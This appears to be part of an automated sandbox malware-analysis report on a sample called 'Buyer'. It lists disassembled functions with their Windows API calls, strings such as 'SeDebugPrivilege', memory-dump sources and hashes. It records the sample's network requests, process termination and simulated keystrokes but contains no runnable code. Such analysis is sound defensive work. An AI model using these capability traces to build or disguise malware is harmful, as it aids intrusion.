                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                    • String ID: close all
                                                                                                    • API String ID: 469580280-3243417748
                                                                                                    • Opcode ID: b5c48465dc33398738f951d7a94baae784b2b14f724048a7a8eeedbbd7d78c61
                                                                                                    • Instruction ID: 4eca138a08d858332d029eb2f7a333e6f0a222b73d335e64fdfd4214d8bd1a5f
                                                                                                    • Opcode Fuzzy Hash: b5c48465dc33398738f951d7a94baae784b2b14f724048a7a8eeedbbd7d78c61
                                                                                                    • Instruction Fuzzy Hash: 99D17D71B01212CFCB19EF14C895B69FBA5BF04B14F1542AEE94A7B261CB34AD12EF40
                                                                                                    Function 00FB855F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FB871C
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB8730
                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00FB875A
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00FB8774
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB8786
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB87CF
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00FB881F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 769691225-438819550
                                                                                                    • Opcode ID: 22d71bbe1cee89de842db5c019ae10a38536d6957fde8387d53ac2502a961ea2
                                                                                                    • Instruction ID: a7971404f0f09f93e67fb1176ba977658b43998fa3bb604521739696b2b999f2
                                                                                                    • Opcode Fuzzy Hash: 22d71bbe1cee89de842db5c019ae10a38536d6957fde8387d53ac2502a961ea2
                                                                                                    • Instruction Fuzzy Hash: 85818F729042459BCB20EF15C854AEAB7EDABC4364F28482EF885D7250DF34DD46EF52
                                                                                                    Function 00F462A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00F46337
                                                                                                      • Part of subcall function 00F463C7: GetClientRect.USER32(?,?), ref: 00F463ED
                                                                                                      • Part of subcall function 00F463C7: GetWindowRect.USER32(?,?), ref: 00F4642E
                                                                                                      • Part of subcall function 00F463C7: ScreenToClient.USER32(?,?), ref: 00F46456
                                                                                                    • GetDC.USER32 ref: 00F8509B
                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F850AE
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F850BC
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F850D1
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00F850D9
                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F8516A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                    • String ID: U
                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                    • Opcode ID: 0a6445abdeab9d697912b2167647dd57b7521625554af4ba7f9e852c9531941f
                                                                                                    • Instruction ID: 10e717556478bdfc56196ebfaaf66171b3328354fee269c9c089b34c67a17584
                                                                                                    • Opcode Fuzzy Hash: 0a6445abdeab9d697912b2167647dd57b7521625554af4ba7f9e852c9531941f
                                                                                                    • Instruction Fuzzy Hash: 1171E231900A09DFCF25AF64CC88BFA3BB2FF45720F14026AED559A256C7358840FB51
                                                                                                    Function 00FD91EE Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F59DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F59DE2
                                                                                                      • Part of subcall function 00F4135A: GetCursorPos.USER32(?), ref: 00F4136E
                                                                                                      • Part of subcall function 00F4135A: ScreenToClient.USER32(00000000,?), ref: 00F4138B
                                                                                                      • Part of subcall function 00F4135A: GetAsyncKeyState.USER32(00000001), ref: 00F413C2
                                                                                                      • Part of subcall function 00F4135A: GetAsyncKeyState.USER32(00000002), ref: 00F413DC
                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00FD9257
                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00FD925D
                                                                                                    • ReleaseCapture.USER32 ref: 00FD9263
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00FD92FE
                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00FD9311
                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00FD93EB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                    • API String ID: 1924731296-2107944366
                                                                                                    • Opcode ID: c8b8ddc6ce18b937b5536b6537525fd1e638b6cc3d488b810576e438df0d880b
                                                                                                    • Instruction ID: baaa6a434b1c5c4e71eaa18d890cf55c1c440359b577c4aa1088b47d75a8c215
                                                                                                    • Opcode Fuzzy Hash: c8b8ddc6ce18b937b5536b6537525fd1e638b6cc3d488b810576e438df0d880b
                                                                                                    • Instruction Fuzzy Hash: 3751DE31504304AFD704EF24CC9AFAA7BEAFB88714F14061EF991572E1CBB99904EB52
                                                                                                    Function 00FBC9C2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FBC9E1
                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FBCA09
                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FBCA39
                                                                                                    • GetLastError.KERNEL32 ref: 00FBCA91
                                                                                                    • SetEvent.KERNEL32(?), ref: 00FBCAA5
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00FBCAB0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                    • Opcode ID: f7163fc261eee8e57dc21aa7f31abebb781a80c870b37c89c84430b6050b935f
                                                                                                    • Instruction ID: e150ab506d848ef51ef4913f094fd787bc155d1b57ff8311bf54f8c80e359383
                                                                                                    • Opcode Fuzzy Hash: f7163fc261eee8e57dc21aa7f31abebb781a80c870b37c89c84430b6050b935f
                                                                                                    • Instruction Fuzzy Hash: B3316BB1A01608AFD721DF76DC98AAB7BFCEB45754B10451AF446D3240DB38DD04AFA1
                                                                                                    Function 00FA2781 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetParent.USER32 ref: 00FA278D
                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00FA27A2
                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FA282F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                    • Opcode ID: 302c321cbf5a2f08144dcf9dbe77f1b25a5292d3f6d71c7a691c10b867429bf7
                                                                                                    • Instruction ID: 9423f7d9c34f97d74a1ce069f72eedf20ca68e3aa791d059ceefca4005431c29
                                                                                                    • Opcode Fuzzy Hash: 302c321cbf5a2f08144dcf9dbe77f1b25a5292d3f6d71c7a691c10b867429bf7
                                                                                                    • Instruction Fuzzy Hash: F511E9F7748707B9FA0137299C0ADA6379DDF16734F200027F901A90D1FF6AA951B554
                                                                                                    Function 00F7D1E1 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1282221369-0
                                                                                                    • Opcode ID: af01f1c6100d4f3e812672af8d8e634b8b6a805acf65802b3065378f8d0d9a37
                                                                                                    • Instruction ID: c2eb4dfdb36e700c1cc3f1af0981295e8488edc50f5e44a9de0df905ee3a0010
                                                                                                    • Opcode Fuzzy Hash: af01f1c6100d4f3e812672af8d8e634b8b6a805acf65802b3065378f8d0d9a37
                                                                                                    • Instruction Fuzzy Hash: 93610671D04301AFDB35BF749C816697BB49F06324F94C16FE94CA7286E63A9801E793
                                                                                                    Function 00FD5894 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00FD5946
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00FD5987
                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000), ref: 00FD598D
                                                                                                    • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00FD5991
                                                                                                      • Part of subcall function 00FD7685: DeleteObject.GDI32(00000000), ref: 00FD76B1
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FD59CD
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FD59DA
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00FD5A0D
                                                                                                    • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00FD5A47
                                                                                                    • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00FD5A56
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 3210457359-0
                                                                                                    • Opcode ID: 93acf7d89815b498e50d906367126fd8cae2d96777d95911852fba5195a1d22f
                                                                                                    • Instruction ID: 46476d38cea05cc1f9543044f21c140e7d47e295d1faec54f74cdd3cdd740c4e
                                                                                                    • Opcode Fuzzy Hash: 93acf7d89815b498e50d906367126fd8cae2d96777d95911852fba5195a1d22f
                                                                                                    • Instruction Fuzzy Hash: 02518F31A51A18EEEF249F24CC95FD83B67AB04B70F184117F615963E1C3799A80FB42
                                                                                                    Function 00F58E2B Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F96F36
                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F96F4F
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F96F5F
                                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F96F77
                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F96F98
                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F58E0E,00000000,00000000,00000000,000000FF,00000000), ref: 00F96FA7
                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F96FC4
                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F58E0E,00000000,00000000,00000000,000000FF,00000000), ref: 00F96FD3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1268354404-0
                                                                                                    • Opcode ID: b92b3842c9a8d91e96484a8b47212efdc29bdea460250fc11a3203b712443da3
                                                                                                    • Instruction ID: 119fa093a58b199c80a6d709727b3392d71b2347d7b7c52500288f6608b6d054
                                                                                                    • Opcode Fuzzy Hash: b92b3842c9a8d91e96484a8b47212efdc29bdea460250fc11a3203b712443da3
                                                                                                    • Instruction Fuzzy Hash: 0E518C70A00209EFEF20DF64CC46BAA7BB6EB44765F104119FA46E7290EB75E845EB50
                                                                                                    Function 00FBC8B2 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FBC8F1
                                                                                                    • GetLastError.KERNEL32 ref: 00FBC904
                                                                                                    • SetEvent.KERNEL32(?), ref: 00FBC918
                                                                                                      • Part of subcall function 00FBC9C2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FBC9E1
                                                                                                      • Part of subcall function 00FBC9C2: GetLastError.KERNEL32 ref: 00FBCA91
                                                                                                      • Part of subcall function 00FBC9C2: SetEvent.KERNEL32(?), ref: 00FBCAA5
                                                                                                      • Part of subcall function 00FBC9C2: InternetCloseHandle.WININET(00000000), ref: 00FBCAB0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 337547030-0
                                                                                                    • Opcode ID: 67143d40a930d4598c71a924cf9d47f6398d75baffc9768b931e46a64710afd0
                                                                                                    • Instruction ID: 5f3dcd8cb7bf4fd6431d010cd286195dce9bf5e883591dd61e15f535005d17a4
                                                                                                    • Opcode Fuzzy Hash: 67143d40a930d4598c71a924cf9d47f6398d75baffc9768b931e46a64710afd0
                                                                                                    • Instruction Fuzzy Hash: F7314B75601A09AFEB219F76CC44AABBFB9FF48350B04441EF95686610D731E814BFA0
                                                                                                    Function 00FA2C84 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FA4128: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA4142
                                                                                                      • Part of subcall function 00FA4128: GetCurrentThreadId.KERNEL32 ref: 00FA4149
                                                                                                      • Part of subcall function 00FA4128: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00FA2C95), ref: 00FA4150
                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FA2C9F
                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FA2CBD
                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00FA2CC1
                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FA2CCB
                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FA2CE3
                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00FA2CE7
                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FA2CF1
                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FA2D05
                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00FA2D09
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2014098862-0
                                                                                                    • Opcode ID: 14d151d171e6a2abdb16800f48b44de291cf25d9d881cf03a29dff5808768c78
                                                                                                    • Instruction ID: 2ef3113a26a5957338d954943e8f231272392cbd181c51460b2a1174b0bc884d
                                                                                                    • Opcode Fuzzy Hash: 14d151d171e6a2abdb16800f48b44de291cf25d9d881cf03a29dff5808768c78
                                                                                                    • Instruction Fuzzy Hash: 9E01D871380218BBFB1067789C8AF593F5ADB5AB22F100012F318AE1E0C9E16444AA69
                                                                                                    Function 00FCA869 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FADAC1: CreateToolhelp32Snapshot.KERNEL32 ref: 00FADAE6
                                                                                                      • Part of subcall function 00FADAC1: Process32FirstW.KERNEL32(00000000,?), ref: 00FADAF4
                                                                                                      • Part of subcall function 00FADAC1: FindCloseChangeNotification.KERNEL32(00000000), ref: 00FADBC1
                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FCA8F4
                                                                                                    • GetLastError.KERNEL32 ref: 00FCA907
                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FCA93A
                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FCA9EF
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00FCA9FA
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FCAA4B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                                                                    • String ID: SeDebugPrivilege
                                                                                                    • API String ID: 1701285019-2896544425
                                                                                                    • Opcode ID: c1bf84637aa865f6fa4dac2b3a401ba259c85f2c9afbfb5bfe193e4de9a7095c
                                                                                                    • Instruction ID: 32fb67bc1205a06c15366e5bee7319426504c51e01eb3c94fc5cb604da8f02bb
                                                                                                    • Opcode Fuzzy Hash: c1bf84637aa865f6fa4dac2b3a401ba259c85f2c9afbfb5bfe193e4de9a7095c
                                                                                                    • Instruction Fuzzy Hash: F5619F71604206AFD320DF18C996F16BBE1AF4431CF19848CE4568BBA2C779FD45EB92
                                                                                                    Function 00FD4044 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00FD40E3
                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00FD40F8
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00FD4112
                                                                                                    • _wcslen.LIBCMT ref: 00FD4157
                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00FD4184
                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00FD41B2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                    • String ID: SysListView32
                                                                                                    • API String ID: 2147712094-78025650
                                                                                                    • Opcode ID: ecad9543d296a0f2d43256f94a3fae762904fb6b828df23b9e5d63bd7b9cd192
                                                                                                    • Instruction ID: 41275419d1862bccb7ad0a9d0bea46f8b4ae95a88b887e68c0c391da6e74aa89
                                                                                                    • Opcode Fuzzy Hash: ecad9543d296a0f2d43256f94a3fae762904fb6b828df23b9e5d63bd7b9cd192
                                                                                                    • Instruction Fuzzy Hash: 0241C471D00318ABDB219F64CC49BEA7BAAFF48360F140527F944E7281D775AD94DB90
